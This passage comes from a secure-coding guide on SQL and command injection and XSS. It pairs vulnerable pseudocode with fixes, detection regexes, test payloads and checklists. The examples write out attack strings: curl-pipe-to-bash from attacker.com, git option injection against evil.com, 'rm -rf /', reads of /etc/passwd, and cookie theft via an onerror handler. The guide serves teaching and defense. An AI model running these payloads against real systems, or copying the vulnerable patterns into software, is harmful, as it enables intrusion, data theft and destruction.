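One way to handle the second layer of escaping is to escape the wildcards in the search term and declare the escape character in the query. The sketch below assumes SQLite (via Python's sqlite3 module) and a products table with a name column; the helper names are illustrative, and the ESCAPE syntax may need adjusting for other databases.

```python
import sqlite3


def escape_like(term: str, escape_char: str = "\\") -> str:
    """Escape LIKE wildcards so that % and _ match literally."""
    return (
        term.replace(escape_char, escape_char * 2)  # escape the escape char first
        .replace("%", escape_char + "%")
        .replace("_", escape_char + "_")
    )


def search_products(conn: sqlite3.Connection, term: str) -> list[tuple]:
    pattern = f"%{escape_like(term)}%"  # only these outer wildcards stay active
    return conn.execute(
        "SELECT name FROM products WHERE name LIKE ? ESCAPE '\\' ORDER BY name",
        (pattern,),
    ).fetchall()
```

With this in place, a search for "%" returns only products whose name contains a literal percent sign. An empty term still matches every row, so a minimum length check on the term is worth adding where result size matters.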

Bad Example 5: Batch/Stacked Query Injection

// VULNERABLE: Query that allows stacking
function updateUserEmail(userId, newEmail):
    query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}"
    database.execute(query, multiStatement = true)

// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --"
// Result: Creates new admin account

// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --"
// Result: Mass password reset for all admins

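Why this is dangerous:

Some database drivers allow multiple statements by default.
A single injection point enables unlimited query execution.
Attackers can create backdoor accounts, modify permissions, and exfiltrate data.
It is often overlooked because the original query still "succeeds".

Command Injection: Multiple Bad Examples

Bad Example 1: Shell Command Construction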

// VULNERABLE: Direct command construction
function pingHost(hostname):
    command = "ping -c 4 " + hostname
    return shell.execute(command)

// Attack: hostname = "127.0.0.1; cat /etc/passwd"
// Result: ping -c 4 127.0.0.1; cat /etc/passwd
// Executes both commands

// VULNERABLE: Using shell=True with format strings
function checkDiskUsage(directory):
    command = f"du -sh {directory}"
    return subprocess.run(command, shell=True)

// Attack: directory = "/tmp; rm -rf /"
// Result: Destructive command execution

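Why this is dangerous:

Shell metacharacters (;, |, &, $(), backticks) enable command chaining.
The attacker gains shell access to the server.
The attacker can read sensitive files, install malware, and attack other systems.
shell=True interprets all special characters.

Bad Example 2: Path Manipulation in Commands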

// VULNERABLE: File path from user input
function convertImage(inputFile, outputFile):
    command = f"convert {inputFile} -resize 800x600 {outputFile}"
    return shell.execute(command)

// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash"
// Result: Downloads and executes malware

// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg"
// Result: File exfiltration via command substitution

// VULNERABLE: Filename in archiving
function createBackup(filename):
    command = f"tar -czf backup.tar.gz {filename}"
    return shell.execute(command)

// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh"
// Result: tar option injection (GTFOBins-style attack)

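Why this is dangerous:

Paths often contain attacker-controlled parts (uploaded filenames).
Command-line tools have dangerous flag behaviors (GTFOBins).
Argument injection is possible even without shell metacharacters.
$(...) and backticks execute subcommands.

Bad Example 3: Argument Injection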

// VULNERABLE: Arguments from user input
function fetchUrl(url):
    command = f"curl {url}"
    return shell.execute(command)

// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php"
// Result: Writes file to webserver (web shell)

// Attack: url = "--config /etc/passwd"
// Result: Error message reveals file contents

// VULNERABLE: Git commands with user input
function cloneRepository(repoUrl):
    command = f"git clone {repoUrl}"
    return shell.execute(command)

// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo"
// Result: Arbitrary command execution via git options

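Why this is dangerous:

Programs may interpret flags anywhere in the argument list.
Injected flags can override the intended behavior.
-- does not always prevent injection (it depends on the program).
Many tools have "write to file" or "execute" options.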
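
A hedged sketch of one defense against argument injection for the git clone case: validate the URL against an allowlist of schemes, reject anything that starts with a dash, and place the end-of-options marker -- before positional arguments. The function name and the https-only policy are assumptions for illustration; the function only builds the argument list and does not run git.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}  # assumption: only HTTPS remotes are acceptable


def build_clone_args(repo_url: str, dest_dir: str) -> list[str]:
    """Build an argument list for git clone that cannot smuggle in options."""
    if repo_url.startswith("-"):
        raise ValueError("repository URL must not start with '-'")
    parts = urlsplit(repo_url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("repository URL must be an https URL with a host")
    # "--" ends option parsing, so the values after it are treated as positional.
    return ["git", "clone", "--", repo_url, dest_dir]
```

The resulting list is meant to be passed to a process API without a shell. Validation and -- are layered on purpose, because not every program honors -- the same way.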

Bad Example 4: Environment Variable Injection

// VULNERABLE: User-controlled environment variable
function runWithCustomPath(command, customPath):
    environment = {"PATH": customPath}
    return subprocess.run(command, env=environment, shell=True)

// Attack: customPath = "/tmp/evil:$PATH"
// If /tmp/evil contains malicious 'ls' binary, it executes instead

// VULNERABLE: Library path manipulation
function loadPlugin(pluginPath):
    environment = {"LD_PRELOAD": pluginPath}
    return subprocess.run("target-app", env=environment)

// Attack: pluginPath = "/tmp/evil.so"
// Result: Malicious shared library loaded, code execution

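Why this is dangerous:

Environment variables affect program behavior in unexpected ways.
PATH hijacking allows attacker binaries to execute.
LD_PRELOAD/DYLD_INSERT_LIBRARIES enable library injection.
Some programs read secrets from the environment (accidental exposure).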

Good Examples: Correct Patterns

Good Example 1: Parameterized Queries (Patterns for All Major Databases)

// SECURE: Parameterized query - positional parameters
function getUserById(userId):
    query = "SELECT * FROM users WHERE id = ?"
    return database.execute(query, [userId])

// SECURE: Named parameters
function getUserByEmailAndStatus(email, status):
    query = "SELECT * FROM users WHERE email = :email AND status = :status"
    return database.execute(query, {email: email, status: status})

// SECURE: Multiple value insertion
function createUser(name, email, role):
    query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)"
    return database.execute(query, [name, email, role])

// SECURE: IN clause with dynamic count
function getUsersByIds(userIds):
    placeholders = ", ".join(["?" for _ in userIds])
    query = f"SELECT * FROM users WHERE id IN ({placeholders})"
    return database.execute(query, userIds)

// SECURE: Transaction with multiple parameterized queries
function transferFunds(fromId, toId, amount):
    database.beginTransaction()
    try:
        database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId])
        database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId])
        database.commit()
    catch error:
        database.rollback()
        throw error

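Why this is secure:

The database driver separates query structure from data.
Parameters are never interpreted as SQL.
Works with all standard data types.
Prevents all SQL injection variants in value positions.

Good Example 2: Safe ORM Usage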

// SECURE: ORM with typed queries
function getUserById(userId):
    return User.findOne({where: {id: userId}})

// SECURE: ORM with relationships
function getUserWithOrders(userId):
    return User.findOne({
        where: {id: userId},
        include: [{model: Order, as: 'orders'}]
    })

// SECURE: ORM query builder
function searchProducts(filters):
    query = Product.query()

    if filters.category:
        query = query.where('category', '=', filters.category)
    if filters.minPrice:
        query = query.where('price', '>=', filters.minPrice)
    if filters.maxPrice:
        query = query.where('price', '<=', filters.maxPrice)

    return query.get()

// WARNING: ORM raw query - still needs parameterization!
function customQuery(userId):
    // STILL VULNERABLE if using string interpolation:
    // return database.raw(f"SELECT * FROM users WHERE id = {userId}")

    // SECURE: Use ORM's parameterization
    return database.raw("SELECT * FROM users WHERE id = ?", [userId])

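Why this is secure:

The ORM handles parameterization automatically.
Type checking blocks some injection attempts.
Query builders construct safe queries programmatically.
Raw queries still need to be handled with care.

Good Example 3: Safe Dynamic Table/Column Names (Allowlist)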

// SECURE: Allowlist for table names
ALLOWED_TABLES = {"users", "products", "orders", "categories"}

function getDataFromTable(tableName, id):
    if tableName not in ALLOWED_TABLES:
        throw ValidationError("Invalid table name")

    // Safe because tableName is from allowlist, not user input
    query = f"SELECT * FROM {tableName} WHERE id = ?"
    return database.execute(query, [id])

// SECURE: Allowlist for sort columns
SORT_COLUMNS = {
    "name": "name",
    "price": "price",
    "date": "created_at",
    "popularity": "view_count"
}

function getProducts(sortBy, sortOrder):
    column = SORT_COLUMNS.get(sortBy, "name")  // Default to 'name'
    direction = "DESC" if sortOrder == "desc" else "ASC"

    query = f"SELECT * FROM products ORDER BY {column} {direction}"
    return database.execute(query)

// SECURE: Quoted identifiers as additional defense
function getDataDynamic(tableName, columnName, value):
    if tableName not in ALLOWED_TABLES:
        throw ValidationError("Invalid table")
    if columnName not in ALLOWED_COLUMNS[tableName]:
        throw ValidationError("Invalid column")

    // Use database quoting function for identifiers
    quotedTable = database.quoteIdentifier(tableName)
    quotedColumn = database.quoteIdentifier(columnName)

    query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?"
    return database.execute(query, [value])

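Why this is secure:

The allowlist ensures only known-safe values are used.
User input is mapped to predefined safe values.
Identifier quoting provides defense in depth.
Validation happens before the query is built.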
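
The sort-column allowlist from the pseudocode above translates almost directly into Python. This sketch uses the standard sqlite3 module and assumes a products table with name, price, and created_at columns; the function name is illustrative.

```python
import sqlite3

# Maps user-facing sort keys to real column names; nothing else reaches the SQL.
SORT_COLUMNS = {"name": "name", "price": "price", "date": "created_at"}


def list_products(
    conn: sqlite3.Connection, sort_by: str = "name", sort_order: str = "asc"
) -> list[tuple]:
    column = SORT_COLUMNS.get(sort_by, "name")  # unknown keys fall back to name
    direction = "DESC" if sort_order.lower() == "desc" else "ASC"
    # Safe to interpolate: both fragments come from fixed values in this module.
    query = f"SELECT name, price FROM products ORDER BY {column} {direction}"
    return conn.execute(query).fetchall()
```

Falling back to a default keeps the endpoint usable when a client sends an unknown sort key. Raising a validation error instead is equally valid and makes probing attempts more visible.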

Good Example 4: Safe Command Execution

// SECURE: Argument array (no shell interpretation)
function pingHost(hostname):
    // Validate hostname format first
    if not isValidHostname(hostname):
        throw ValidationError("Invalid hostname format")

    // Use argument array - shell metacharacters are literal
    result = subprocess.run(
        ["ping", "-c", "4", hostname],
        shell = false,  // CRITICAL: no shell interpretation
        capture_output = true,
        timeout = 30
    )
    return result.stdout

// SECURE: Allowlist for command arguments
ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"}

function convertImage(inputPath, outputPath, format):
    // Validate format from allowlist
    if format not in ALLOWED_FORMATS:
        throw ValidationError("Invalid format")

    // Validate paths are within allowed directory
    if not isPathWithinDirectory(inputPath, UPLOAD_DIR):
        throw ValidationError("Invalid input path")
    if not isPathWithinDirectory(outputPath, OUTPUT_DIR):
        throw ValidationError("Invalid output path")

    // Safe argument array
    result = subprocess.run(
        ["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"],
        shell = false
    )
    return result

// SECURE: Using libraries instead of shell commands
function checkDiskUsage(directory):
    // Use language-native library instead of shell
    return filesystem.getDirectorySize(directory)

function readJsonFile(filepath):
    // Don't use: shell.execute(f"cat {filepath} | jq .")
    // Use language JSON library
    return json.parse(filesystem.readFile(filepath))

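Why this is secure:

The argument array passes arguments directly to the program
No shell interprets metacharacters
The allowlist prevents unexpected values
Path validation prevents directory traversal
Native libraries avoid the shell entirely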
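To see that an argument array really treats shell metacharacters as literal text, the following sketch runs a child process and echoes back the argument it received. It assumes Python's standard subprocess module; `sys.executable` is used only as a stand-in for an external tool such as ping, and `echo_argument` is a hypothetical helper.

```python
import subprocess
import sys

def echo_argument(arg: str) -> str:
    # sys.executable stands in for an external tool; the child process
    # simply prints the single argument it received.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", arg],
        capture_output=True,
        text=True,
        timeout=30,
        check=True,
    )  # shell defaults to False, so no shell parses the argument
    return result.stdout.strip()

payload = "example.com; echo INJECTED"
received = echo_argument(payload)
```

The child receives the whole payload, semicolon included, as one argument. Nothing after the semicolon is run as a second command.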

Edge Cases

Edge Case 1: Second-Order Injection (Stored First, Executed Later)

// DANGEROUS: Data stored safely but used unsafely later

// Step 1: User creates profile (looks safe)
function createProfile(userId, displayName):
    // Parameterized - SAFE for initial storage
    query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)"
    database.execute(query, [userId, displayName])
    // Attacker sets displayName = "admin'--"

// Step 2: Background job uses stored data UNSAFELY
function generateReportForUser(userId):
    // Get the stored display name
    profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])
    displayName = profile.display_name
    // "admin'--" retrieved from database

    // VULNERABLE: Trusting data from database
    reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')"
    database.execute(reportQuery)
    // Result: INSERT INTO reports (title) VALUES ('Report for admin'--')

// SECURE: Parameterize ALL queries, even with "internal" data
function generateReportForUserSafe(userId):
    profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])

    // Still parameterize even though data is from database
    reportQuery = "INSERT INTO reports (title) VALUES (?)"
    database.execute(reportQuery, [f"Report for {profile.display_name}"])

Detection: Audit every code path that uses data read from the database in a later query.
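The two-step pattern can be reproduced with an in-memory SQLite database. This is a sketch under stated assumptions: the table names follow the pseudocode above, and the payload is a hypothetical one chosen so that its effect is visible as an extra row.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE profiles (user_id INTEGER, display_name TEXT)")
conn.execute("CREATE TABLE reports (title TEXT)")

# Step 1: the payload is stored safely through a parameterized INSERT.
payload = "x'), ('forged row"
conn.execute("INSERT INTO profiles VALUES (?, ?)", (1, payload))
stored = conn.execute(
    "SELECT display_name FROM profiles WHERE user_id = ?", (1,)
).fetchone()[0]

# Step 2 (vulnerable): interpolating the stored value changes the statement,
# which now inserts two rows instead of one.
conn.execute(f"INSERT INTO reports (title) VALUES ('Report for {stored}')")
unsafe_count = conn.execute("SELECT COUNT(*) FROM reports").fetchone()[0]

# Step 2 (safe): the stored value is bound as a single parameter.
conn.execute("DELETE FROM reports")
conn.execute("INSERT INTO reports (title) VALUES (?)", (f"Report for {stored}",))
safe_rows = conn.execute("SELECT title FROM reports").fetchall()
```

The stored value is identical in both runs; only the way the second query is built decides whether it acts as data or as SQL.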

Edge Case 2: Injection Inside Stored Procedures

// DANGEROUS: Dynamic SQL inside stored procedure

// Stored Procedure Definition (in database)
CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100))
BEGIN
    // VULNERABLE: Dynamic SQL construction
    SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%''');
    PREPARE stmt FROM @query;
    EXECUTE stmt;
END

// Application code looks safe...
function searchUsers(term):
    return database.callProcedure("searchUsers", [term])
    // But injection still occurs inside the procedure!

// SECURE: Parameterized even in stored procedures
CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100))
BEGIN
    // Use parameterization within procedure
    SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%');
    // Or use prepared statement properly
    SET @query = 'SELECT * FROM users WHERE name LIKE ?';
    SET @search = CONCAT('%', searchTerm, '%');
    PREPARE stmt FROM @query;
    EXECUTE stmt USING @search;
END

Detection: Review all stored procedures for dynamic SQL construction.

Edge Case 3: Injection via Encoding Bypass

// DANGEROUS: Encoding-based bypass attempts

// Scenario 1: Double-encoding bypass
function searchWithFilter(term):
    // WAF or framework decodes once: %2527 -> %27
    // The filter sees %27, not a single quote, and lets it through
    // Application decodes a second time: %27 -> '
    decoded = urlDecode(term)

    query = f"SELECT * FROM items WHERE name = '{decoded}'"
    // Injection succeeds

// Scenario 2: Unicode normalization bypass
function filterUsername(username):
    // Check for dangerous characters
    if "'" in username or "\"" in username:
        throw ValidationError("Invalid characters")

    // VULNERABLE: Unicode normalization happens AFTER validation
    normalized = unicodeNormalize(username)
    // Example: U+FF07 (fullwidth apostrophe) normalizes to "'" (U+0027) under NFKC

    query = f"SELECT * FROM users WHERE username = '{normalized}'"

// SECURE: Parameterization makes encoding irrelevant
function searchSafe(term):
    // Encoding doesn't matter - it's just data
    query = "SELECT * FROM items WHERE name = ?"
    return database.execute(query, [term])

// SECURE: Validate AFTER all normalization
function filterUsernameSafe(username):
    // Normalize first
    normalized = unicodeNormalize(username)

    // Then validate
    if not isValidUsernameChars(normalized):
        throw ValidationError("Invalid characters")

    // Then use (still with parameterization)
    query = "SELECT * FROM users WHERE username = ?"
    return database.execute(query, [normalized])

Detection: Test with a variety of encoded payloads (%27, %2527, Unicode variants).
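Both bypasses can be observed directly with Python's standard library. The sketch below assumes NFKC normalization and uses U+FF07 (fullwidth apostrophe) as the look-alike character; `is_valid_username` and its alphanumeric-only rule are hypothetical.

```python
import unicodedata
from urllib.parse import unquote

# Double encoding: one decode leaves no quote, a second decode reveals it.
once = unquote("%2527")
twice = unquote(once)

# Unicode normalization: U+FF07 becomes U+0027 under NFKC.
raw = "admin\uFF07--"
passes_naive_check = "'" not in raw          # the pre-normalization filter is fooled
normalized = unicodedata.normalize("NFKC", raw)

def is_valid_username(name: str) -> bool:
    # Hypothetical rule: normalize first, then validate the canonical form.
    canonical = unicodedata.normalize("NFKC", name)
    return canonical.isalnum()
```

Validating the canonical form rejects the payload. The query that follows should still be parameterized, so validation is not the only barrier.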

Common Mistakes

Mistake 1: Thinking Escaping Is Enough

// DANGEROUS: Manual escaping is error-prone

function getUserByNameEscaped(name):
    // "Escaping" by replacing quotes
    escapedName = name.replace("'", "''")
    query = f"SELECT * FROM users WHERE name = '{escapedName}'"
    return database.execute(query)

// Problems with this approach:
// 1. Different databases have different escape rules
// 2. Multibyte character encoding bypasses (GBK, etc.)
// 3. Doesn't handle all injection vectors
// 4. Easy to forget in one place
// 5. Backslash escaping varies by database

// Attack (MySQL with NO_BACKSLASH_ESCAPES off):
// name = "\' OR 1=1 --"
// Result: \'' OR 1=1 -- (backslash escapes first quote)

// Attack (multibyte): name = 0xbf27
// In GBK: 0xbf5c27 -> valid multibyte char + literal quote

// ALWAYS USE PARAMETERIZATION - it's not about escaping
function getUserByNameSafe(name):
    query = "SELECT * FROM users WHERE name = ?"
    return database.execute(query, [name])

Key insight: Parameterization does not "escape" anything; it sends the query structure and the data separately.
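The difference between concatenation and binding is easy to observe with sqlite3. This is a minimal sketch; the `users` table and its rows are assumptions made for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])

payload = "' OR '1'='1"

# Concatenation: the payload rewrites the WHERE clause and matches every row.
concatenated = conn.execute(
    f"SELECT name FROM users WHERE name = '{payload}'"
).fetchall()

# Parameter binding: the payload is compared as a literal string.
bound = conn.execute(
    "SELECT name FROM users WHERE name = ?", (payload,)
).fetchall()
```

With binding, the statement is compiled with a placeholder and the value is supplied separately, so no character in the payload can end the string literal.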

Mistake 2: Trusting "Internal" Data Sources

// DANGEROUS: Trusting data because it's "internal"

function processMessage(messageFromQueue):
    // "This is from our internal queue, so it's safe"
    userId = messageFromQueue.userId

    query = f"SELECT * FROM users WHERE id = {userId}"
    return database.execute(query)

// BUT: Where did that queue message originate?
// - User input that was serialized to queue
// - External API response stored in queue
// - Another service that has its own vulnerabilities

// DANGEROUS: Trusting data from other tables/services
function getOrderDetails(orderId):
    order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId])

    // Order.notes was user-supplied
    query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'"
    // Still vulnerable to second-order injection

// SECURE: Parameterize ALL queries regardless of data source
function processMessageSafe(messageFromQueue):
    query = "SELECT * FROM users WHERE id = ?"
    return database.execute(query, [messageFromQueue.userId])

Rule: When building queries, never trust any data, whatever its source; always parameterize.

Mistake 3: Partial Parameterization

// DANGEROUS: Parameterizing some parts but not others

function searchUsers(name, sortColumn, limit):
    // Parameterized the value, but not ORDER BY or LIMIT
    query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}"
    return database.execute(query, [name])

// Attack: sortColumn = "1; DELETE FROM users; --"
// Attack: limit = "1 UNION SELECT password FROM admin_users"

// DANGEROUS: Parameterized WHERE but not table
function getDataFlexible(tableName, filterColumn, filterValue):
    query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?"
    return database.execute(query, [filterValue])
    // Table name and column still injectable

// SECURE: Validate/allowlist everything that can't be parameterized
function searchUsersSafe(name, sortColumn, limit):
    // Allowlist for sort column
    allowedSorts = {"name", "email", "created_at"}
    sortCol = sortColumn if sortColumn in allowedSorts else "name"

    // Validate limit is positive integer
    limitNum = min(max(int(limit), 1), 100)  // Clamp to 1-100

    query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}"
    return database.execute(query, [name])

Key insight: Every injectable position needs either parameterization or allowlist validation.
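A possible Python rendering of the safe variant is sketched below. The fallback limit of 20 for non-numeric input is an assumption that the pseudocode does not specify, and `build_search_query` is a hypothetical helper name.

```python
ALLOWED_SORTS = {"name", "email", "created_at"}

def build_search_query(sort_column: str, limit) -> str:
    # Anything outside the allowlist falls back to a fixed column.
    sort_col = sort_column if sort_column in ALLOWED_SORTS else "name"
    try:
        limit_num = int(limit)
    except (TypeError, ValueError):
        limit_num = 20  # hypothetical default for non-numeric input
    limit_num = min(max(limit_num, 1), 100)  # clamp to 1-100
    # Only allowlisted text and a clamped integer are interpolated;
    # the search value is still bound through the "?" placeholder.
    return (
        "SELECT name FROM users WHERE name LIKE ? "
        f"ORDER BY {sort_col} LIMIT {limit_num}"
    )
```

Many drivers also accept LIMIT as a bound parameter. Where that is available, binding it is simpler than clamping and interpolating.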

Detection Hints and Testing Approaches

Automated Detection Patterns

// Regex patterns to find SQL injection vulnerabilities:

// 1. String concatenation with SQL keywords
regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i

// 2. Format strings with SQL
regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i

// 3. String interpolation in queries
regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/

// Command injection patterns:

// 4. Shell execution with concatenation
regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/

// 5. Shell=True with variables
regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/
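As a rough illustration of how such patterns might be wired into a scanner, the sketch below translates pattern 2 into Python's `re` syntax and uses a simplified form of pattern 5 that flags any `shell=True`. The `scan` function and the rule names are hypothetical. Regex-based scanning produces both false positives and false negatives, so treat the output as a list of review candidates.

```python
import re

# Python translations of two of the patterns above; matches are only hints.
SQL_FSTRING = re.compile(
    r"""f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}""", re.IGNORECASE
)
SHELL_TRUE = re.compile(r"shell\s*=\s*[Tt]rue")

def scan(source: str):
    """Return (line number, rule name) pairs for lines worth reviewing."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if SQL_FSTRING.search(line):
            findings.append((lineno, "sql-fstring"))
        if SHELL_TRUE.search(line):
            findings.append((lineno, "shell-true"))
    return findings

sample = '''query = f"SELECT * FROM users WHERE id = {user_id}"
rows = db.execute("SELECT * FROM users WHERE id = ?", [user_id])
subprocess.run(cmd, shell=True)
'''
findings = scan(sample)
```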

Manual Testing Approaches

// SQL Injection Test Payloads:

basicTests = [
    "' OR '1'='1",           // Basic auth bypass
    "'; DROP TABLE test; --", // Stacked queries
    "' UNION SELECT null--",  // Union-based
    "1 AND 1=1",             // Boolean-based
    "1' AND SLEEP(5)--",     // Time-based blind
]

// Command Injection Test Payloads:

commandTests = [
    "; whoami",              // Command chaining
    "| id",                  // Pipe injection
    "$(whoami)",             // Command substitution
    "`id`",                  // Backtick substitution
    "& ping -c 4 attacker.com", // Background execution
]

// Testing Methodology:
1. Identify all input points (forms, URLs, headers, JSON fields)
2. Trace input flow to database queries or shell commands
3. Inject test payloads at each point
4. Monitor for:
   - SQL errors in response
   - Time delays (for blind injection)
   - DNS/HTTP callbacks (for out-of-band)
   - Changed behavior indicating injection success

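Code Review Checklist

Check	What to look for
Query construction	Any string concatenation or interpolation into query strings
Dynamic identifiers	Table names, column names, or ORDER BY values taken from user input
Raw queries in ORMs	`.raw()`, `.execute()`, or similar calls that build strings
Shell execution	Any use of `system()`, `exec()`, or `shell=True`
Command building	String concatenation before command execution
Input sources	Trace data from the request to the query/command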

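Security Checklist

All SQL queries use parameterized statements or prepared queries
ORM raw queries also use parameterization
Dynamic table/column names are validated against a strict allowlist
ORDER BY and LIMIT clauses use validated/allowlisted values
No shell=True in subprocess calls
All command arguments are passed as arrays, not as strings
User-controlled file paths are validated and sanitized
Environment variables are not set from user input
Second-order injection is considered (data from the database is still parameterized)
Stored procedures have been reviewed for internal dynamic SQL
Input validation happens after all normalization/decoding
Code review specifically checks all query/command construction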

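Pattern 3: Cross-Site Scripting (XSS)

CWE references: CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Basic XSS), CWE-83 (Improper Neutralization of Script in Attributes), CWE-87 (Improper Neutralization of Alternate XSS Syntax)

Priority score: 23 (Frequency: 10, Severity: 8, Detectability: 5)

Introduction: Why AI Often Overlooks Context-Sensitive Encoding

Cross-site scripting (XSS) is one of the most common vulnerabilities in AI-generated code. Research indicates that 86% of AI-generated code fails to defend against XSS (Veracode 2025), and that AI-generated code is 2.74 times more likely to contain XSS than human-written code (CodeRabbit analysis).

Why AI models generate XSS vulnerabilities:

Context blindness: XSS protection requires understanding the context in which user input will be rendered: HTML body, attribute, JavaScript, CSS, or URL. Each context needs a different encoding. Lacking awareness of the rendering context, AI models often apply a generic encoding or none at all.
Training data is full of innerHTML: Tutorials and Stack Overflow answers make heavy use of innerHTML, document.write(), and template string injection for DOM manipulation. AI learns these as standard patterns.
Framework misunderstanding: Modern frameworks such as React provide automatic escaping, but AI often bypasses these protections with dangerouslySetInnerHTML, v-html, or raw template interpolation, especially when the task seems to require "rich" HTML output.
Confusing encoding with validation: AI models often validate input (checking for allowed characters) but omit output encoding (rendering data safely in its context). Validation protects data integrity; encoding prevents XSS.
Client-side trust: AI often treats client-side code as "safe" because it runs in the browser. It fails to recognize that XSS exploits precisely the trust the browser places in the application.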
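To make the context-blindness point concrete, the sketch below encodes one value for three different contexts using only Python's standard library. The sample value is hypothetical. Note that `json.dumps` produces a valid string literal but does not escape `<`, so on its own it is not sufficient inside an inline script block.

```python
import html
import json
from urllib.parse import quote

value = "O'Brien <admin> & co"

html_body = html.escape(value)       # text between tags or inside quoted attributes
js_literal = json.dumps(value)       # a quoted JavaScript/JSON string literal
url_param = quote(value, safe="")    # a query-string parameter value
```

The three results differ because each context has its own set of significant characters; no single encoding is correct for all of them.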

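Impact of XSS:

Session hijacking: the attacker steals session cookies and impersonates the victim
Account takeover: keylogging, credential theft, or forced password changes
Data exfiltration: theft of sensitive data displayed to the user
Malware distribution: redirecting users to malicious sites
Defacement: altering page content for phishing or reputational damage
Worm propagation: self-propagating XSS (the Samy worm infected 1 million MySpace users)

XSS variants:

Type	Storage	Execution	Example vector
Reflected	URL/request	Immediate	Search query echoed in the results page
Stored	Database	Later visitors	Blog comment containing a script
DOM-based	Client side	JavaScript processing	URL fragment processed by JS
Mutation (mXSS)	Sanitizer bypass	DOM mutation	Markup that changes during parsing

Bad Examples Across Contexts

Bad Example 1: HTML Body Injection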

// VULNERABLE: Direct injection into HTML body
function displayUserComment(comment):
    // User input directly placed in HTML
    document.getElementById("comments").innerHTML =
        "<div class='comment'>" + comment + "</div>"

// Attack: comment = "<img src=x onerror=\"location='http://evil.com/steal?c='+document.cookie\">"
// Result: onerror handler runs, cookies sent to attacker
// (a <script> tag assigned via innerHTML is not executed, but event handlers are)

// VULNERABLE: Server-side template without encoding
function renderProfilePage(username, bio):
    return """
        <html>
        <body>
            <h1>Profile: {username}</h1>
            <p>{bio}</p>
        </body>
        </html>
    """.format(username=username, bio=bio)

// Attack: bio = "<img src=x onerror='alert(document.cookie)'>"
// Result: onerror handler executes JavaScript

// VULNERABLE: Using document.write
function showWelcome(name):
    document.write("<h2>Welcome, " + name + "!</h2>")

// Attack: name = "<img src=x onerror=alert('XSS')>"

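Why this is dangerous:

Script tags execute as soon as the parser encounters them (server-rendered HTML, document.write)
Event handlers (onerror, onload, onclick) execute without script tags
SVG elements can contain executable code
document.write and innerHTML parse HTML in user input

Bad Example 2: HTML Attribute Injection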

// VULNERABLE: User input in HTML attributes
function renderImage(imageUrl, altText):
    return '<img src="' + imageUrl + '" alt="' + altText + '">'

// Attack: altText = '" onmouseover="alert(document.cookie)" x="'
// Result: <img src="img.jpg" alt="" onmouseover="alert(document.cookie)" x="">

// VULNERABLE: Unquoted attributes
function renderLink(url, text):
    return "<a href=" + url + ">" + text + "</a>"

// Attack: url = "http://site.com onclick=alert(1)"
// Result: <a href=http://site.com onclick=alert(1)>text</a>

// VULNERABLE: Input in style attribute
function setBackgroundColor(color):
    element.setAttribute("style", "background-color: " + color)

// Attack: color = "red; background-image: url('javascript:alert(1)')"
// Attack: color = "expression(alert('XSS'))"  // IE-specific

// VULNERABLE: Event handler attribute
function renderButton(buttonId, label):
    return '<button id="' + buttonId + '" onclick="handleClick(\'' + label + '\')">' + label + '</button>'

// Attack: label = "'); alert(document.cookie); ('"
// Result: onclick="handleClick(''); alert(document.cookie); ('')"

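Why this is dangerous:

Unquoted attributes end at whitespace, which allows new attributes to be added
Quoted attributes can be broken out of with a matching quote
Event handler attributes execute JavaScript directly
Some attributes (href, src, style) have special parsing rules

Bad Example 3: JavaScript Context Injection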

// VULNERABLE: User input embedded in JavaScript
function generateUserScript(username):
    return """
        <script>
            var currentUser = '{username}';
            displayGreeting(currentUser);
        </script>
    """.format(username=username)

// Attack: username = "'; alert(document.cookie); //'"
// Result: var currentUser = ''; alert(document.cookie); //'';

// VULNERABLE: JSON data embedded in script
function embedUserData(userData):
    return """
        <script>
            var data = {userData};
            processData(data);
        </script>
    """.format(userData=jsonEncode(userData))

// Attack: userData contains </script><script>alert(1)</script>
// JSON encoding doesn't prevent HTML context escape

// VULNERABLE: Template literals with user input
